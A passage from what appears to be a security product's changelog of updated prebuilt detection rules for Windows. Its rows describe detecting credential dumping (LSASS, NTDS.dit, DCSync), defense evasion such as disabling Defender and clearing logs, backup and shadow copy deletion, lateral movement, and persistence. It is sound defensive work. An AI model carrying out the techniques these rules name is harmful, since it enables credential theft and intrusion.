| update | 108 + +|<<prebuilt-rule-8-10-5-potential-file-transfer-via-certreq, Potential File Transfer via Certreq>> | Identifies Certreq making an HTTP Post request. Adversaries could abuse Certreq to download files or upload data to a remote URL. | update | 5 + +|<<prebuilt-rule-8-10-5-connection-to-commonly-abused-web-services, Connection to Commonly Abused Web Services>> | Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. | update | 108 + +|<<prebuilt-rule-8-10-5-potential-dns-tunneling-via-nslookup, Potential DNS Tunneling via NsLookup>> | This rule identifies a large number (15) of nslookup.exe executions with an explicit query type from the same host. This may indicate command and control activity utilizing the DNS protocol. | update | 107 + +|<<prebuilt-rule-8-10-5-port-forwarding-rule-addition, Port Forwarding Rule Addition>> | Identifies the creation of a new port forwarding rule. An adversary may abuse this technique to bypass network segmentation restrictions. | update | 107 + +|<<prebuilt-rule-8-10-5-potential-remote-desktop-tunneling-detected, Potential Remote Desktop Tunneling Detected>> | Identifies potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. 
| update | 107 + +|<<prebuilt-rule-8-10-5-remote-file-download-via-script-interpreter, Remote File Download via Script Interpreter>> | Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination. | update | 108 + +|<<prebuilt-rule-8-10-5-potential-credential-access-via-windows-utilities, Potential Credential Access via Windows Utilities>> | Identifies the execution of known Windows utilities often abused to dump LSASS memory or the Active Directory database (NTDS.dit) in preparation for credential access. | update | 109 + +|<<prebuilt-rule-8-10-5-ntds-or-sam-database-file-copied, NTDS or SAM Database File Copied>> | Identifies a copy operation of the Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files. Those files contain sensitive information including hashed domain and/or local credentials. | update | 107 + +|<<prebuilt-rule-8-10-5-potential-credential-access-via-trusted-developer-utility, Potential Credential Access via Trusted Developer Utility>> | An instance of MSBuild, the Microsoft Build Engine, loaded DLLs (dynamically linked libraries) responsible for Windows credential management. This technique is sometimes used for credential dumping. | update | 108 + +|<<prebuilt-rule-8-10-5-firsttime-seen-account-performing-dcsync, FirstTime Seen Account Performing DCSync>> | This rule identifies when a User Account starts the Active Directory Replication Process for the first time. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. | update | 7 + +|<<prebuilt-rule-8-10-5-potential-credential-access-via-dcsync, Potential Credential Access via DCSync>> | This rule identifies when a User Account starts the Active Directory Replication Process. 
Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. | update | 110 + +|<<prebuilt-rule-8-10-5-kerberos-pre-authentication-disabled-for-user, Kerberos Pre-authentication Disabled for User>> | Identifies the modification of an account's Kerberos pre-authentication options. An adversary with GenericWrite/GenericAll rights over the account can maliciously modify these settings to perform offline password cracking attacks such as AS-REP roasting. | update | 108 + +|<<prebuilt-rule-8-10-5-access-to-a-sensitive-ldap-attribute, Access to a Sensitive LDAP Attribute>> | Identify access to sensitive Active Directory object attributes that contains credentials and decryption keys such as unixUserPassword, ms-PKI-AccountCredentials and msPKI-CredentialRoamingTokens. | update | 8 + +|<<prebuilt-rule-8-10-5-lsass-process-access-via-windows-api, LSASS Process Access via Windows API>> | Identifies access attempts to the LSASS handle, which may indicate an attempt to dump credentials from LSASS memory. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-local-ntlm-relay-via-http, Potential Local NTLM Relay via HTTP>> | Identifies attempt to coerce a local NTLM authentication via HTTP using the Windows Printer Spooler service as a target. An adversary may use this primitive in combination with other techniques to elevate privileges on a compromised system. | update | 107 + +|<<prebuilt-rule-8-10-5-sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user, Sensitive Privilege SeEnableDelegationPrivilege assigned to a User>> | Identifies the assignment of the SeEnableDelegationPrivilege sensitive "user right" to a user. The SeEnableDelegationPrivilege "user right" enables computer and user accounts to be trusted for delegation. Attackers can abuse this right to compromise Active Directory accounts and elevate their privileges. 
| update | 108 + +|<<prebuilt-rule-8-10-5-potential-credential-access-via-renamed-com-services-dll, Potential Credential Access via Renamed COM+ Services DLL>> | Identifies suspicious renamed COMSVCS.DLL Image Load, which exports the MiniDump function that can be used to dump a process memory. This may indicate an attempt to dump LSASS memory while bypassing command-line based detection in preparation for credential access. | update | 105 + +|<<prebuilt-rule-8-10-5-potential-credential-access-via-lsass-memory-dump, Potential Credential Access via LSASS Memory Dump>> | Identifies suspicious access to LSASS handle from a call trace pointing to DBGHelp.dll or DBGCore.dll, which both export the MiniDumpWriteDump method that can be used to dump LSASS memory content in preparation for credential access. | update | 207 + +|<<prebuilt-rule-8-10-5-suspicious-remote-registry-access-via-sebackupprivilege, Suspicious Remote Registry Access via SeBackupPrivilege>> | Identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation. | update | 108 + +|<<prebuilt-rule-8-10-5-symbolic-link-to-shadow-copy-created, Symbolic Link to Shadow Copy Created>> | Identifies the creation of symbolic links to a shadow copy. Symbolic links can be used to access files in the shadow copy, including sensitive files such as ntds.dit, System Boot Key and browser offline credentials. | update | 107 + +|<<prebuilt-rule-8-10-5-adding-hidden-file-attribute-via-attrib, Adding Hidden File Attribute via Attrib>> | Adversaries can add the 'hidden' attribute to files to hide them from the user in an attempt to evade detection. 
| update | 109 + +|<<prebuilt-rule-8-10-5-modification-of-amsienable-registry-key, Modification of AmsiEnable Registry Key>> | Identifies modifications of the AmsiEnable registry key to 0, which disables the Antimalware Scan Interface (AMSI). An adversary can modify this key to disable AMSI protections. | update | 107 + +|<<prebuilt-rule-8-10-5-clearing-windows-console-history, Clearing Windows Console History>> | Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. | update | 107 + +|<<prebuilt-rule-8-10-5-clearing-windows-event-logs, Clearing Windows Event Logs>> | Identifies attempts to clear or disable Windows event log stores using Windows wevetutil command. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. | update | 108 + +|<<prebuilt-rule-8-10-5-code-signing-policy-modification-through-registry, Code Signing Policy Modification Through Registry>> | Identifies attempts to disable/modify the code signing policy through the registry. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code. | update | 6 + +|<<prebuilt-rule-8-10-5-windows-defender-disabled-via-registry-modification, Windows Defender Disabled via Registry Modification>> | Identifies modifications to the Windows Defender registry settings to disable the service or set the service to be started manually. | update | 107 + +|<<prebuilt-rule-8-10-5-powershell-script-block-logging-disabled, PowerShell Script Block Logging Disabled>> | Identifies attempts to disable PowerShell Script Block Logging via registry modification. Attackers may disable this logging to conceal their activities in the host and evade detection. 
| update | 107 + +|<<prebuilt-rule-8-10-5-disabling-windows-defender-security-settings-via-powershell, Disabling Windows Defender Security Settings via PowerShell>> | Identifies use of the Set-MpPreference PowerShell command to disable or weaken certain Windows Defender settings. | update | 107 + +|<<prebuilt-rule-8-10-5-disable-windows-event-and-security-logs-using-built-in-tools, Disable Windows Event and Security Logs Using Built-in Tools>> | Identifies attempts to disable EventLog via the logman Windows utility, PowerShell, or auditpol. This is often done by attackers in an attempt to evade detection on a system. | update | 108 + +|<<prebuilt-rule-8-10-5-dns-over-https-enabled-via-registry, DNS-over-HTTPS Enabled via Registry>> | Identifies when a user enables DNS-over-HTTPS. This can be used to hide internet activity or the process of exfiltrating data. With this enabled, an organization will lose visibility into data such as query type, response, and originating IP, which are used to determine bad actors. | update | 106 + +|<<prebuilt-rule-8-10-5-suspicious-net-code-compilation, Suspicious .NET Code Compilation>> | Identifies executions of .NET compilers with suspicious parent processes, which can indicate an attacker's attempt to compile code after delivery in order to bypass security mechanisms. | update | 107 + +|<<prebuilt-rule-8-10-5-microsoft-build-engine-started-by-a-script-process, Microsoft Build Engine Started by a Script Process>> | An instance of MSBuild, the Microsoft Build Engine, was started by a script or the Windows command interpreter. This behavior is unusual and is sometimes used by malicious payloads. | update | 206 + +|<<prebuilt-rule-8-10-5-microsoft-build-engine-using-an-alternate-name, Microsoft Build Engine Using an Alternate Name>> | An instance of MSBuild, the Microsoft Build Engine, was started after being renamed. This is uncommon behavior and may indicate an attempt to run unnoticed or undetected. 
| update | 109 + +|<<prebuilt-rule-8-10-5-microsoft-build-engine-started-an-unusual-process, Microsoft Build Engine Started an Unusual Process>> | An instance of MSBuild, the Microsoft Build Engine, started a PowerShell script or the Visual C# Command Line Compiler. This technique is sometimes used to deploy a malicious payload using the Build Engine. | update | 207 + +|<<prebuilt-rule-8-10-5-potential-dll-side-loading-via-trusted-microsoft-programs, Potential DLL Side-Loading via Trusted Microsoft Programs>> | Identifies an instance of a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side loading a malicious DLL within the memory space of one of those processes. | update | 107 + +|<<prebuilt-rule-8-10-5-process-injection-by-the-microsoft-build-engine, Process Injection by the Microsoft Build Engine>> | An instance of MSBuild, the Microsoft Build Engine, created a thread in another process. This technique is sometimes used to evade detection or elevate privileges. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-endpoint-security-parent-process, Suspicious Endpoint Security Parent Process>> | A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection. | update | 107 + +|<<prebuilt-rule-8-10-5-suspicious-werfault-child-process, Suspicious WerFault Child Process>> | A suspicious WerFault child process was detected, which may indicate an attempt to run via the SilentProcessExit registry key manipulation. Verify process details such as command line, network connections and file writes. 
| update | 108 + +|<<prebuilt-rule-8-10-5-potential-windows-error-manager-masquerading, Potential Windows Error Manager Masquerading>> | Identifies suspicious instances of the Windows Error Reporting process (WerFault.exe or Wermgr.exe) with matching command-line and process executable values performing outgoing network connections. This may be indicative of a masquerading attempt to evade suspicious child process behavior detections. | update | 106 + +|<<prebuilt-rule-8-10-5-microsoft-windows-defender-tampering, Microsoft Windows Defender Tampering>> | Identifies when one or more features on Microsoft Defender are disabled. Adversaries may disable or tamper with Microsoft Defender features to evade detection and conceal malicious behavior. | update | 107 + +|<<prebuilt-rule-8-10-5-network-connection-via-signed-binary, Network Connection via Signed Binary>> | Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Adversaries may use these binaries to 'live off the land' and execute malicious files that could bypass application allowlists and signature validation. | update | 106 + +|<<prebuilt-rule-8-10-5-unusual-network-activity-from-a-windows-system-binary, Unusual Network Activity from a Windows System Binary>> | Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection. | update | 108 + +|<<prebuilt-rule-8-10-5-parent-process-pid-spoofing, Parent Process PID Spoofing>> | Identifies parent process spoofing used to thwart detection. Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. 
| update | 105 + +|<<prebuilt-rule-8-10-5-local-account-tokenfilter-policy-disabled, Local Account TokenFilter Policy Disabled>> | Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. | update | 6 + +|<<prebuilt-rule-8-10-5-suspicious-net-reflection-via-powershell, Suspicious .NET Reflection via PowerShell>> | Detects the use of Reflection.Assembly to load PEs and DLLs in memory in PowerShell scripts. Attackers use this method to load executables and DLLs without writing to the disk, bypassing security solutions. | update | 109 + +|<<prebuilt-rule-8-10-5-potential-process-injection-via-powershell, Potential Process Injection via PowerShell>> | Detects the use of Windows API functions that are commonly abused by malware and security tools to load malicious code or inject it into remote processes. | update | 108 + +|<<prebuilt-rule-8-10-5-windows-firewall-disabled-via-powershell, Windows Firewall Disabled via PowerShell>> | Identifies when the Windows Firewall is disabled using PowerShell cmdlets, which can help attackers evade network constraints, like internet and network lateral communication restrictions. | update | 107 + +|<<prebuilt-rule-8-10-5-process-termination-followed-by-deletion, Process Termination followed by Deletion>> | Identifies a process termination event quickly followed by the deletion of its executable file. Malware tools and other non-native files dropped or created on a system by an adversary may leave traces to indicate to what occurred. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. 
| update | 107 + +|<<prebuilt-rule-8-10-5-scheduled-tasks-at-command-enabled, Scheduled Tasks AT Command Enabled>> | Identifies attempts to enable the Windows scheduled tasks AT command via the registry. Attackers may use this method to move laterally or persist locally. The AT command has been deprecated since Windows 8 and Windows Server 2012, but still exists for backwards compatibility. | update | 106 + +|<<prebuilt-rule-8-10-5-potential-secure-file-deletion-via-sdelete-utility, Potential Secure File Deletion via SDelete Utility>> | Detects file name patterns generated by the use of Sysinternals SDelete utility to securely delete a file via multiple file overwrite and rename operations. | update | 107 + +|<<prebuilt-rule-8-10-5-solarwinds-process-disabling-services-via-registry, SolarWinds Process Disabling Services via Registry>> | Identifies a SolarWinds binary modifying the start type of a service to be disabled. An adversary may abuse this technique to manipulate relevant security services. | update | 106 + +|<<prebuilt-rule-8-10-5-suspicious-execution-from-a-mounted-device, Suspicious Execution from a Mounted Device>> | Identifies when a script interpreter or signed binary is launched via a non-standard working directory. An attacker may use this technique to evade defenses. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-managed-code-hosting-process, Suspicious Managed Code Hosting Process>> | Identifies a suspicious managed code hosting process which could indicate code injection or other form of suspicious code execution. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-process-access-via-direct-system-call, Suspicious Process Access via Direct System Call>> | Identifies suspicious process access events from an unknown memory region. Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. 
It's possible to bypass hooked functions by writing malicious functions that call syscalls directly. | update | 209 + +|<<prebuilt-rule-8-10-5-suspicious-script-object-execution, Suspicious Script Object Execution>> | Identifies scrobj.dll loaded into unusual Microsoft processes. This usually means a malicious scriptlet is being executed in the target process. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-wmic-xsl-script-execution, Suspicious WMIC XSL Script Execution>> | Identifies WMIC allowlist bypass techniques by alerting on suspicious execution of scripts. When WMIC loads scripting libraries it may be indicative of an allowlist bypass. | update | 106 + +|<<prebuilt-rule-8-10-5-suspicious-zoom-child-process, Suspicious Zoom Child Process>> | A suspicious Zoom child process was detected, which may indicate an attempt to run unnoticed. Verify process details such as command line, network connections, file writes and associated file signature details as well. | update | 108 + +|<<prebuilt-rule-8-10-5-unusual-executable-file-creation-by-a-system-critical-process, Unusual Executable File Creation by a System Critical Process>> | Identifies an unexpected executable file being created or modified by a Windows system critical process, which may indicate activity related to remote code execution or other forms of exploitation. | update | 108 + +|<<prebuilt-rule-8-10-5-unsigned-dll-side-loading-from-a-suspicious-folder, Unsigned DLL Side-Loading from a Suspicious Folder>> | Identifies a Windows trusted program running from locations often abused by adversaries to masquerade as a trusted program and loading a recently dropped DLL. This behavior may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of a signed processes. | update | 5 + +|<<prebuilt-rule-8-10-5-untrusted-driver-loaded, Untrusted Driver Loaded>> | Identifies attempt to load an untrusted driver. 
Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. | update | 6 + +|<<prebuilt-rule-8-10-5-adfind-command-activity, AdFind Command Activity>> | This rule detects the Active Directory query tool, AdFind.exe. AdFind has legitimate purposes, but it is frequently leveraged by threat actors to perform post-exploitation Active Directory reconnaissance. The AdFind tool has been observed in Trickbot, Ryuk, Maze, and FIN6 campaigns. For Winlogbeat, this rule requires Sysmon. | update | 107 + +|<<prebuilt-rule-8-10-5-account-discovery-command-via-system-account, Account Discovery Command via SYSTEM Account>> | Identifies when the SYSTEM account uses an account discovery utility. This could be a sign of discovery activity after an adversary has achieved privilege escalation. | update | 107 + +|<<prebuilt-rule-8-10-5-powershell-share-enumeration-script, PowerShell Share Enumeration Script>> | Detects scripts that contain PowerShell functions, structures, or Windows API functions related to windows share enumeration activities. Attackers, mainly ransomware groups, commonly identify and inspect network shares, looking for critical information for encryption and/or exfiltration. | update | 7 + +|<<prebuilt-rule-8-10-5-powershell-suspicious-discovery-related-windows-api-functions, PowerShell Suspicious Discovery Related Windows API Functions>> | This rule detects the use of discovery-related Windows API functions in PowerShell Scripts. Attackers can use these functions to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc. | update | 110 + +|<<prebuilt-rule-8-10-5-command-execution-via-solarwinds-process, Command Execution via SolarWinds Process>> | A suspicious SolarWinds child process (Cmd.exe or Powershell.exe) was detected. 
| update | 107 + +|<<prebuilt-rule-8-10-5-command-shell-activity-started-via-rundll32, Command Shell Activity Started via RunDLL32>> | Identifies command shell activity started via RunDLL32, which is commonly abused by attackers to host malicious code. | update | 107 + +|<<prebuilt-rule-8-10-5-suspicious-portable-executable-encoded-in-powershell-script, Suspicious Portable Executable Encoded in Powershell Script>> | Detects the presence of a portable executable (PE) in a PowerShell script by looking for its encoded header. Attackers embed PEs into PowerShell scripts to inject them into memory, avoiding defences by not writing to disk. | update | 108 + +|<<prebuilt-rule-8-10-5-psexec-network-connection, PsExec Network Connection>> | Identifies use of the SysInternals tool PsExec.exe making a network connection. This could be an indication of lateral movement. | update | 107 + +|<<prebuilt-rule-8-10-5-network-connection-via-registration-utility, Network Connection via Registration Utility>> | Identifies the native Windows tools regsvr32.exe, regsvr64.exe, RegSvcs.exe, or RegAsm.exe making a network connection. This may be indicative of an attacker bypassing allowlists or running arbitrary scripts via a signed Microsoft binary. | update | 106 + +|<<prebuilt-rule-8-10-5-outbound-scheduled-task-activity-via-powershell, Outbound Scheduled Task Activity via PowerShell>> | Identifies the PowerShell process loading the Task Scheduler COM DLL followed by an outbound RPC network connection within a short time period. This may indicate lateral movement or remote discovery via scheduled tasks. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-cmd-execution-via-wmi, Suspicious Cmd Execution via WMI>> | Identifies suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. 
| update | 107 + +|<<prebuilt-rule-8-10-5-suspicious-pdf-reader-child-process, Suspicious PDF Reader Child Process>> | Identifies suspicious child processes of PDF reader applications. These child processes are often launched via exploitation of PDF applications or social engineering. | update | 107 + +|<<prebuilt-rule-8-10-5-suspicious-process-execution-via-renamed-psexec-executable, Suspicious Process Execution via Renamed PsExec Executable>> | Identifies suspicious psexec activity which is executing from the psexec service that has been renamed, possibly to evade detection. | update | 108 + +|<<prebuilt-rule-8-10-5-conhost-spawned-by-suspicious-parent-process, Conhost Spawned By Suspicious Parent Process>> | Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection. | update | 107 + +|<<prebuilt-rule-8-10-5-third-party-backup-files-deleted-via-unexpected-process, Third-party Backup Files Deleted via Unexpected Process>> | Identifies the deletion of backup files, saved using third-party software, by a process outside of the backup suite. Adversaries may delete Backup files to ensure that recovery from a ransomware attack is less likely. | update | 108 + +|<<prebuilt-rule-8-10-5-deleting-backup-catalogs-with-wbadmin, Deleting Backup Catalogs with Wbadmin>> | Identifies use of the wbadmin.exe to delete the backup catalog. Ransomware and other malware may do this to prevent system recovery. | update | 107 + +|<<prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-powershell, Volume Shadow Copy Deletion via PowerShell>> | Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve shadow copy deletion. This commonly occurs in tandem with ransomware or other destructive attacks. | update | 107 + +|<<prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-wmic, Volume Shadow Copy Deletion via WMIC>> | Identifies use of wmic.exe for shadow copy deletion on endpoints. 
This commonly occurs in tandem with ransomware or other destructive attacks. | update | 107 + +|<<prebuilt-rule-8-10-5-windows-script-executing-powershell, Windows Script Executing PowerShell>> | Identifies a PowerShell process launched by either cscript.exe or wscript.exe. Observing Windows scripting processes executing a PowerShell script, may be indicative of malicious activity. | update | 107 + +|<<prebuilt-rule-8-10-5-windows-script-interpreter-executing-process-via-wmi, Windows Script Interpreter Executing Process via WMI>> | Identifies use of the built-in Windows script interpreters (cscript.exe or wscript.exe) being used to execute a process via Windows Management Instrumentation (WMI). This may be indicative of malicious activity. | update | 107 + +|<<prebuilt-rule-8-10-5-microsoft-exchange-server-um-writing-suspicious-files, Microsoft Exchange Server UM Writing Suspicious Files>> | Identifies suspicious files being written by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26858. | update | 105 + +|<<prebuilt-rule-8-10-5-microsoft-exchange-server-um-spawning-suspicious-processes, Microsoft Exchange Server UM Spawning Suspicious Processes>> | Identifies suspicious processes being spawned by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26857. | update | 105 + +|<<prebuilt-rule-8-10-5-microsoft-exchange-worker-spawning-suspicious-processes, Microsoft Exchange Worker Spawning Suspicious Processes>> | Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). This activity may indicate exploitation activity or access to an existing web shell backdoor. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-ms-office-child-process, Suspicious MS Office Child Process>> | Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel). 
These child processes are often launched during exploitation of Office applications or from documents with malicious macros. | update | 108 + +|<<prebuilt-rule-8-10-5-suspicious-ms-outlook-child-process, Suspicious MS Outlook Child Process>> | Identifies suspicious child processes of Microsoft Outlook. These child processes are often associated with spear phishing activity. | update | 107 + +|<<prebuilt-rule-8-10-5-suspicious-explorer-child-process, Suspicious Explorer Child Process>> | Identifies a suspicious Windows explorer child process. Explorer.exe can be abused to launch malicious scripts or executables from a trusted parent process. | update | 106 + +|<<prebuilt-rule-8-10-5-incoming-dcom-lateral-movement-with-mmc, Incoming DCOM Lateral Movement with MMC>> | Identifies the use of Distributed Component Object Model (DCOM) to run commands from a remote host, which are launched via the MMC20 Application COM Object. This behavior may indicate an attacker abusing a DCOM application to move laterally. | update | 106 + +|<<prebuilt-rule-8-10-5-nullsessionpipe-registry-modification, NullSessionPipe Registry Modification>> | Identifies NullSessionPipe registry modifications that specify which pipes can be accessed anonymously. This could be indicative of adversary lateral movement preparation by making the added pipe available to everyone. | update | 106 + +|<<prebuilt-rule-8-10-5-potential-remote-desktop-shadowing-activity, Potential Remote Desktop Shadowing Activity>> | Identifies the modification of the Remote Desktop Protocol (RDP) Shadow registry or the execution of processes indicative of an active RDP shadowing session. An adversary may abuse the RDP Shadowing feature to spy on or control other users active RDP sessions. | update | 106 + +|<<prebuilt-rule-8-10-5-potential-lateral-tool-transfer-via-smb-share, Potential Lateral Tool Transfer via SMB Share>> | Identifies the creation or change of a Windows executable file over network shares. 
Adversaries may transfer tools or other files between systems in a compromised environment. | update | 107 + +|<<prebuilt-rule-8-10-5-execution-via-tsclient-mountpoint, Execution via TSClient Mountpoint>> | Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint tsclient on the target host. This may indicate a lateral movement attempt. | update | 106 + +|<<prebuilt-rule-8-10-5-remote-execution-via-file-shares, Remote Execution via File Shares>> | Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. | update | 108 + +|<<prebuilt-rule-8-10-5-wmi-incoming-lateral-movement, WMI Incoming Lateral Movement>> | Identifies processes executed via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement, but could be noisy if administrators use WMI to remotely manage hosts. | update | 108 + +|<<prebuilt-rule-8-10-5-incoming-execution-via-powershell-remoting, Incoming Execution via PowerShell Remoting>> | Identifies remote execution via Windows PowerShell remoting. Windows PowerShell remoting allows a user to run any Windows PowerShell command on one or more remote computers. This could be an indication of lateral movement. | update | 107 + +|<<prebuilt-rule-8-10-5-rdp-enabled-via-registry, RDP Enabled via Registry>> | Identifies registry write modifications to enable Remote Desktop Protocol (RDP) access. This could be indicative of adversary lateral movement preparation. | update | 108 + +|<<prebuilt-rule-8-10-5-suspicious-rdp-activex-client-loaded, Suspicious RDP ActiveX Client Loaded>> | Identifies suspicious Image Loading of the Remote Desktop Services ActiveX Client (mstscax), this may indicate the presence of RDP lateral movement capability. 
| update | 105 + +|<<prebuilt-rule-8-10-5-unusual-child-process-of-dns-exe, Unusual Child Process of dns.exe>> | Identifies an unexpected process spawning from dns.exe, the process responsible for Windows DNS server services, which may indicate activity related to remote code execution or other forms of exploitation. | update | 107 + +|<<prebuilt-rule-8-10-5-unusual-file-modification-by-dns-exe, Unusual File Modification by dns.exe>> | Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. | update | 107 + +|<<prebuilt-rule-8-10-5-lateral-movement-via-startup-folder, Lateral Movement via Startup Folder>> | Identifies suspicious file creations in the startup folder of a remote system. An adversary could abuse this to move laterally by dropping a malicious script or executable that will be executed after a reboot or user logon. | update | 105 + +|<<prebuilt-rule-8-10-5-adminsdholder-backdoor, AdminSDHolder Backdoor>> | Detects modifications in the AdminSDHolder object. Attackers can abuse the SDProp process to implement a persistent backdoor in Active Directory. SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, regaining their Administrative Privileges. | update | 106 + +|<<prebuilt-rule-8-10-5-adobe-hijack-persistence, Adobe Hijack Persistence>> | Detects writing executable files that will be automatically launched by Adobe on launch. | update | 108 + +|<<prebuilt-rule-8-10-5-registry-persistence-via-appcert-dll, Registry Persistence via AppCert DLL>> | Detects attempts to maintain persistence by creating registry keys using AppCert DLLs. 
AppCert DLLs are loaded by every process using the common API functions to create processes. | update | 105 + +|<<prebuilt-rule-8-10-5-registry-persistence-via-appinit-dll, Registry Persistence via AppInit DLL>> | AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads user32.dll) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications. Attackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine. | update | 106 + +|<<prebuilt-rule-8-10-5-image-file-execution-options-injection, Image File Execution Options Injection>> | The Debugger and SilentProcessExit registry keys can allow an adversary to intercept the execution of files, causing a different process to be executed. This functionality can be abused by an adversary to establish persistence. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-startup-shell-folder-modification, Suspicious Startup Shell Folder Modification>> | Identifies suspicious startup shell folder modifications to change the default Startup directory in order to bypass detections monitoring file creation in the Windows Startup folder. | update | 108 + +|<<prebuilt-rule-8-10-5-scheduled-task-created-by-a-windows-script, Scheduled Task Created by a Windows Script>> | A scheduled task was created by a Windows script via cscript.exe, wscript.exe or powershell.exe. This can be abused by an adversary to establish persistence. | update | 105 + +|<<prebuilt-rule-8-10-5-persistence-via-microsoft-office-addins, Persistence via Microsoft Office AddIns>> | Detects attempts to establish persistence on an endpoint by abusing Microsoft Office add-ins. 
| update | 105 + +|<<prebuilt-rule-8-10-5-new-activesyncalloweddeviceid-added-via-powershell, New ActiveSyncAllowedDeviceID Added via PowerShell>> | Identifies the use of the Exchange PowerShell cmdlet, Set-CASMailbox, to add a new ActiveSync allowed device. Adversaries may target user email to collect sensitive information. | update | 106 + +|<<prebuilt-rule-8-10-5-persistence-via-powershell-profile, Persistence via PowerShell profile>> | Identifies the creation or modification of a PowerShell profile. PowerShell profile is a script that is executed when PowerShell starts to customize the user environment, which can be abused by attackers to persist in a environment where PowerShell is common. | update | 6 + +|<<prebuilt-rule-8-10-5-account-password-reset-remotely, Account Password Reset Remotely>> | Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials. | update | 107 + +|<<prebuilt-rule-8-10-5-adminsdholder-sdprop-exclusion-added, AdminSDHolder SDProp Exclusion Added>> | Identifies a modification on the dsHeuristics attribute on the bit that holds the configuration of groups excluded from the SDProp process. The SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, meaning that groups excluded will remain unchanged. Attackers can abuse this misconfiguration to maintain long-term access to privileged accounts in these groups. | update | 108 + +|<<prebuilt-rule-8-10-5-unsigned-dll-loaded-by-svchost, Unsigned DLL Loaded by Svchost>> | Identifies an unsigned library created in the last 5 minutes and subsequently loaded by a shared windows service (svchost). 
Adversaries may use this technique to maintain persistence or run with System privileges. | update | 5 + +|<<prebuilt-rule-8-10-5-unusual-persistence-via-services-registry, Unusual Persistence via Services Registry>> | Identifies processes modifying the services registry key directly, instead of through the expected Windows APIs. This could be an indication of an adversary attempting to stealthily persist through abnormal service creation or modification of an existing service. | update | 105 + +|<<prebuilt-rule-8-10-5-startup-folder-persistence-via-unsigned-process, Startup Folder Persistence via Unsigned Process>> | Identifies files written or modified in the startup folder by unsigned processes. Adversaries may abuse this technique to maintain persistence in an environment. | update | 108 + +|<<prebuilt-rule-8-10-5-component-object-model-hijacking, Component Object Model Hijacking>> | Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects. | update | 108 + +|<<prebuilt-rule-8-10-5-suspicious-image-load-taskschd-dll-from-ms-office, Suspicious Image Load (taskschd.dll) from MS Office>> | Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-execution-via-scheduled-task, Suspicious 